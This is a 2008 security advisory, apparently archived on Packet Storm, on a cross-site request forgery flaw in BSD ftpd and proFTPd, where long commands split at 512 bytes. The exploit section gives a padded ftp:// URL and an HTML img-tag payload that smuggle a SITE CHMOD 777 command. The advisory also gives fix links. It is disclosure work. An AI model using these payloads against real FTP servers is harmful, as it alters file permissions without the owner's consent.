exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ftpd-xsrf.txt

ftpd-xsrf.txt
Posted Sep 27, 2008
Authored by Maksymilian Arciemowicz | Site securityreason.com

This advisory discusses the idea of leveraging ftp using the likes of a cross site request forgery attack.

tags | advisory, csrf
SHA-256 | 7fb17ffceff5669295410473648b9b821097dd9a109cceaa4c8721d590ce1646

ftpd-xsrf.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ multiple vendor ftpd - Cross-site request forgery ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- - Written: 03.09.2008
- - Public: 26.09.2008

SecurityReason Research
SecurityAlert Id: 56

CVE: not assigned
SecurityRisk: Low

Affected Software:
This problem has been discovered on OpenBSD 4.3 .
- - Affected systems:
+ OpenBSD
+ NetBSD
+ FreeBSD
+ some linux
- - Affected applications:
+ proFTPd
+ others

Advisory URL:
https://securityreason.com/achievement_securityalert/56


- --- 0.Description ---
ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user.

https://en.wikipedia.org/wiki/Cross-site_request_forgery

- --- 1. ftpd bsd - Cross-site request forgery ---
The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets().

Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

will be split for

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'


When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split.

/* FreeBSD 7.0 */
ftp://cxib@127.0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506


/* NetBSD 4.0 */
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

The situation, can be dangerous, when this bug will be exploited like any CSRF attack. We can use SITE CHMOD command to change file permission or other combinations with ftp commands. Only we need some exploit and luck, that admin will executed exploited url.

How to exploit it?

0.
Creating some html file with <img> tags
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
...

1.
Give preparing URL for user.

Example:
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change permision to EXAMPLEFILE when the owner will use this URL.

I think, it should be some byte, what inform about overflowing (empty command should nulling this byte). We have diagnosed this issue on BSD systems. Unfortunately, we do not know exactly how many machines can be affected.

- --- 2. How to fix ---
OpenBSD has been first informed. Fix is avalible on cvs:

https://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
https://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

Thanks for OpenBSD Team.

NetBSD:
https://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c

proFTPd:
https://bugs.proftpd.org/show_bug.cgi?id=3115

SecurityReason has informed only BSD developers and proFTPd Team.

- --- 3. Greets ---
sp3x infospec p_e_a pi3 schain

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: https://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
https://securityreason.com
https://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (OpenBSD)

iEYEARECAAYFAkjdBroACgkQpiCeOKaYa9aiFgCfSMm4Pb+2ELGr6WVNWcJHWz+8
3NgAoN6Owug0ezaLFqJ65xyrrDImtX3J
=8Rij
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close